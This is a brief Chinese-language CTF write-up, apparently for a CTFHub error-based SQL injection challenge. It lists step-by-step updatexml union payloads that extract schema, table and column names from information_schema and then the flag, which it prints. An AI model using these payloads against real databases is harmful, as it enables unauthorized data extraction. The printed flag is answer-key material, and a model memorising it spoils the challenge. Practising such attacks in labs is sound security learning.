题目描述:
我们输入1
得到查询正确
我们再输入1`试试
给出了报错内容,并且标明了错误点是`
然后我们利用sql函数进行查询
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),30,31) ),1)
库名为 sqli
查询表名
-1 union select updatexml(1,concat('~', substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),1,31) ),1)
查询列名
-1 union select updatexml(1,concat('~', substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'),1,31) ),1)
查询字段
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),1,31) ),1)
-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),20,31) ),1)
得到flag
ctfhub{455aa3bdb68aebab7571a24c}